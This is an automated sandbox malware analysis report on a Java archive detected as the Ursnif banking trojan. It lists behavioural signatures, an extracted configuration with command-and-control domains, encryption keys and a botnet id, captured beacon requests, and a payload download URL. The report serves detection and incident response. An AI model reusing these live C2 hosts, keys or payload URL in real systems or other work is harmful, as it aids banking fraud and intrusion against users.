Windows Analysis Report wuxvGLNrxG.jar

Overview

General Information

Sample Name: wuxvGLNrxG.jar
Analysis ID: 458767
MD5: 62f16f566ecdf99cfc14e82dadf0f18e
SHA1: 9b1dee428b273fe00921b43821fd5deeadf9dd30
SHA256: 04b9398217671d5282716edd773af60c3a57765b679214aa65a04f2565437190
Tags: Gozijar

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Allocates memory in foreign processes
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Drops PE files to the user root directory
Exploit detected, runtime environment dropped PE file
Exploit detected, runtime environment starts unknown processes
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Regsvr32 Command Line Without DLL
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://gtr.antoinfer.com/ Avira URL Cloud: Label: malware
Source: http://gtr.antoinfer.com/vADDezNeSke9U/kvoRl9HX/wg75j_2F1ccwy_2BN_2FgkC/Yh7aCXFF09/ee6kz01isjr6jdjmu/pk1iZnzuGks_/2FuxytqUYce/a5iWzRhuhKAZ4y/D3pXNK4fyJfK_2FkQ5xOt/JVfaKqEHewQX_2Bv/e8GLEmqyRCDOz2z/IZT7WGXdb3gbjuggsB/nJqV1sh4i/1CBsNlHce4vH9r545Rqj/lW_2BT5w8VeL3I13xEE/kQKMsI_2FV_2BAmRAPTTX_/2Fpo46_2FxhKi/aU1VyuXn/ftd9GHd_2FR3UMOYr1sC0hP/YgHDHBl7oA/36ctrYN2Q45zT_2FE/cFBpdxQOL4tl/xsOclWLyg_2B/TAMc8 Avira URL Cloud: Label: malware
Source: http://app.flashgameo.at/3RCQ0msRVVnLSJ5u/TSJ_2Fxz80keoop/a7EjDDG7wrXHG68ZtX/Pmtf7IzJN/aJqNiYsKzCerz7CxDBe7/e24yGD4QU8YxhhSD3YO/03mvbgBdqeCIW6TNLEFcOV/EK49ihmFywAO1/pIF7jejl/dujcubamjFalP53t_2FHK8B/KFSEJwMt_2/BtevMf85tQFfIELR_/2BcnIXZSnbYO/KZzJGKYFtQN/vyvR7VHvQcMFD4/kY1tU9entnPFjHGBpC6PC/rfEItxXtG1ipdjW8/L_2BLpkqRSBRNu3/Qm7zxsLhdRlaAq032b/I1k1iSuisV_2F/6 Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000006.00000002.908239339.00000000059D0000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "XIQ66Sm6I98pcZAgIrZV1QfUYCowoyPvAE0ZGoUgS6LRMgPUz1CjzrhYfIXNK4I/5IuxCPvsPosYMGmpJAGwuiufC5ilxlpxNXjOvZf/072uMnV3R8Omqvlr+TUeswWBriIAFZY/aSr0j7JV6iJrVfwOKuYBzEzn95xd7jqdIO1IDtgQOe1zk9B/od2PHQ4N5H6FvG+U4i9V8MADwHONlD1brINCCdaaC2W6Qp9XxRnFqMgRJ11Iryex4VSd5uE7o6/Nj6obfRxYgX/9kpKybm15Tv3BHBp9AFun5vwEIvKQiP6MHnUYchwnFuWqwNNwMjcVV+KXsy8CJKXx/Cr9tXrtx3Y8jox8xHMgA2vPxVE=", "c2_domain": ["app.flashgameo.at", "apr.intoolkom.at", "r23cirt55ysvtdvl.onion", "gtk5.variyan.at", "pop.biopiof.at", "l46t3vgvmtx5wxe6.onion", "v10.avyanok.com", "free.monotreener.com", "sam.notlaren.at"], "ip_check_url": ["curlmyip.net", "ident.me", "l2.io/ip", "whatismyip.akamai.com"], "serpent_key": "rQH4gusjF0tL2dQz", "server": "580", "sleep_time": "10", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600", "time_value": "600", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "2500", "SetWaitableTimer_value": "60"}
Multi AV Scanner detection for domain / URL
Source: gtr.antoinfer.com Virustotal: Detection: 12%
Source: app.flashgameo.at Virustotal: Detection: 11%
Source: http://gtr.antoinfer.com/ Virustotal: Detection: 12%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_04804CEA CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 6_2_04804CEA
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: unknown HTTPS traffic detected: 162.241.216.53:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000006.00000003.847587906.0000000005EB0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000006.00000003.847587906.0000000005EB0000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059E9386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 6_2_059E9386
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059F0F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 6_2_059F0F53
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059DCA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 6_2_059DCA40
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059D6457 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 6_2_059D6457

Software Vulnerabilities:

Exploit detected, runtime environment starts unknown processes
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Process created: C:\Windows\SysWOW64\regsvr32.exe

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49753 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49753 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49758 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49758 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49769 -> 185.228.233.17:80
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ITOS-ASRU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: d2935c58fe676744fecc8614ee5356c7
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /vADDezNeSke9U/kvoRl9HX/wg75j_2F1ccwy_2BN_2FgkC/Yh7aCXFF09/ee6kz01isjr6jdjmu/pk1iZnzuGks_/2FuxytqUYce/a5iWzRhuhKAZ4y/D3pXNK4fyJfK_2FkQ5xOt/JVfaKqEHewQX_2Bv/e8GLEmqyRCDOz2z/IZT7WGXdb3gbjuggsB/nJqV1sh4i/1CBsNlHce4vH9r545Rqj/lW_2BT5w8VeL3I13xEE/kQKMsI_2FV_2BAmRAPTTX_/2Fpo46_2FxhKi/aU1VyuXn/ftd9GHd_2FR3UMOYr1sC0hP/YgHDHBl7oA/36ctrYN2Q45zT_2FE/cFBpdxQOL4tl/xsOclWLyg_2B/TAMc8 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /dXpECetHmgl/jZ5QgO4VQ5n7Ya/5WG13zv8FsJ7UHAsRzG6o/tuegNb0pKsze1q8m/BFFIoL94oqS3Xy5/2CToYSpB16eSrFtnci/JJpXY6SoH/XreQV46sDPFSsCAJouM2/iHzQUSNMgnJTx55cx3j/MmD3WJXN0HitAsfKYCeS4U/XB8OV1ES5hgCL/nWK1edkO/6qSdyyCugRUjkT1qUOwiCJM/MSiEk138SJ/G1KsZOq03kjmLCLGC/NzwAp9ygsqyP/bGVSLslr6gZ/4vPMzV84dL2DnK/e0EHovLyDjUS4tMV2PpnW/3kIAg9cwvfdjiTOv/CiQZ3QXkz/m HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /237SFcpksL4/7t6llgwWKHmgXp/Q2Om3V7R9P_2BuKwtoBIy/oC3CbdFwoQnO6JXh/oc6axuJmX23HUBQ/N9JcFQDYfZy78xvHdV/Eyu9m3Jwu/vUXfdXXDOpS4qZwZ1V_2/BSzAi4G_2FRJBE9rTzz/lwDEwtsr5SkOway_2FYxPW/GKtqxZardIX_2/F7n7Mkff/zDJ3oI_2FajJGaPVcNFN7vs/1BECSBbaIB/rrP9deBYJAG4Fk9M6/a_2BTn0LDVG_/2BBX_2FrWpo/pKkEfGSjWVOaOG/qDPRic7EtQbS4qL93dRJc/ok0io5QLdQbD64kK/puYTwXgTqGaug8_/2BsYJ7O9A4si/2Us HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /3RCQ0msRVVnLSJ5u/TSJ_2Fxz80keoop/a7EjDDG7wrXHG68ZtX/Pmtf7IzJN/aJqNiYsKzCerz7CxDBe7/e24yGD4QU8YxhhSD3YO/03mvbgBdqeCIW6TNLEFcOV/EK49ihmFywAO1/pIF7jejl/dujcubamjFalP53t_2FHK8B/KFSEJwMt_2/BtevMf85tQFfIELR_/2BcnIXZSnbYO/KZzJGKYFtQN/vyvR7VHvQcMFD4/kY1tU9entnPFjHGBpC6PC/rfEItxXtG1ipdjW8/L_2BLpkqRSBRNu3/Qm7zxsLhdRlaAq032b/I1k1iSuisV_2F/6 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Host: app.flashgameo.at
Source: global traffic HTTP traffic detected: POST /G2C5F00UJRPr4lWW7B/KlWiTxKGE/iBy2NwQRn_2FNqzxZ1SA/nnE6YBk_2FwTOtspunD/n0UU9l81b89vLLjfE3p3Uj/fQlNYlt8jzQNi/5Aw7M_2B/jzrU9Vt5vqUzfxxfb3VGot6/F2UkBoVtFI/sgNG1F2NjkLSSATKg/wDR_2BZFPhI7/vp1xCK4JdVa/NiJS8onshLMtMr/NpAvU_2FiIExiKFqlV2JG/bCzcZcTt0hxiJXde/s362REIbjP_2FK0/_2BWX7D7GQK_2BIZhO/xh6DcQaPA/4HTHkvZP1iB2rEwgLd5L/yeSlsG_2FzPkt/lYPXp0wz/t HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Content-Length: 2 Host: app.flashgameo.at
Source: unknown DNS traffic detected: queries for: data.green-iraq.com
Source: unknown HTTP traffic detected: POST /G2C5F00UJRPr4lWW7B/KlWiTxKGE/iBy2NwQRn_2FNqzxZ1SA/nnE6YBk_2FwTOtspunD/n0UU9l81b89vLLjfE3p3Uj/fQlNYlt8jzQNi/5Aw7M_2B/jzrU9Vt5vqUzfxxfb3VGot6/F2UkBoVtFI/sgNG1F2NjkLSSATKg/wDR_2BZFPhI7/vp1xCK4JdVa/NiJS8onshLMtMr/NpAvU_2FiIExiKFqlV2JG/bCzcZcTt0hxiJXde/s362REIbjP_2FK0/_2BWX7D7GQK_2BIZhO/xh6DcQaPA/4HTHkvZP1iB2rEwgLd5L/yeSlsG_2FzPkt/lYPXp0wz/t HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Content-Length: 2 Host: app.flashgameo.at
Source: java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: java.exe, 00000002.00000002.686346145.0000000009BC5000.00000004.00000001.sdmp String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: regsvr32.exe, 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp, java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp String found in binary or memory: http://cps.letsencrypt.org
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp String found in binary or memory: http://cps.letsencrypt.org0
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp String found in binary or memory: http://cps.letsencrypt.orgk
Source: java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp String found in binary or memory: http://cps.root-x1.letsencrypt.org
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp String found in binary or memory: http://cps.root-x1.letsencrypt.orgK
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp, java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: regsvr32.exe, 00000006.00000003.788708194.0000000002E9C000.00000004.00000001.sdmp String found in binary or memory: http://gtr.antoinfer.com/
Source: regsvr32.exe, 00000006.00000003.788671211.0000000002E92000.00000004.00000001.sdmp String found in binary or memory: http://gtr.antoinfer.com/237SFcpksL4/7t6llgwWKHmgXp/Q2Om3V7R9P_2BuKwtoBIy/oC3CbdFwoQnO6JXh/oc6axuJmX
Source: regsvr32.exe, 00000006.00000003.770611799.0000000002EA8000.00000004.00000001.sdmp String found in binary or memory: http://gtr.antoinfer.com/dXpECetHmgl/jZ5QgO4VQ5n7Ya/5WG13zv8FsJ7UHAsRzG6o/tuegNb0pKsze1q8m/BFFIoL94o
Source: regsvr32.exe, 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: java.exe, 00000002.00000002.686399629.0000000009BD5000.00000004.00000001.sdmp String found in binary or memory: http://java.oracle.com/
Source: java.exe, 00000002.00000002.692030098.000000001535C000.00000004.00000001.sdmp, java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp, java.exe, 00000002.00000003.676737804.0000000014BE0000.00000004.00000001.sdmp String found in binary or memory: http://null.oracle.com/
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp String found in binary or memory: http://policy.camerfirma.com
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp String found in binary or memory: http://policy.camerfirma.com0
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp, java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp String found in binary or memory: http://r3.i.lencr.org/
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp String found in binary or memory: http://r3.i.lencr.org/07
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp String found in binary or memory: http://r3.i.lencr.org/;
Source: java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp String found in binary or memory: http://r3.o.lencr.org
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp String found in binary or memory: http://r3.o.lencr.orgC
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp String found in binary or memory: http://repository.swisssign.com/
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class2.crl
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3P.crl
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp String found in binary or memory: http://www.chambersign.org
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp String found in binary or memory: http://www.chambersign.org1
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadis.bm
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp String found in binary or memory: http://x1.c.lencr.org/
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp String found in binary or memory: http://x1.i.lencr.org/
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp String found in binary or memory: http://x1.i.lencr.org/k
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp, java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp String found in binary or memory: https://data.green-iraq.com/app.dll
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown HTTPS traffic detected: 162.241.216.53:443 -> 192.168.2.4:49729 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000017.00000003.855478624.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761679763.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761625791.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761646149.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.855416865.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.855505099.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761549935.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.772494186.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761577357.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761663070.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761602065.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.855350034.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.765792432.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.936194486.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761692784.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5964, type: MEMORYSTR

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000017.00000003.855478624.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761679763.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761625791.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761646149.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.855416865.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.855505099.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761549935.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.772494186.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761577357.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761663070.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761602065.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.855350034.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.765792432.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.936194486.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761692784.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5964, type: MEMORYSTR
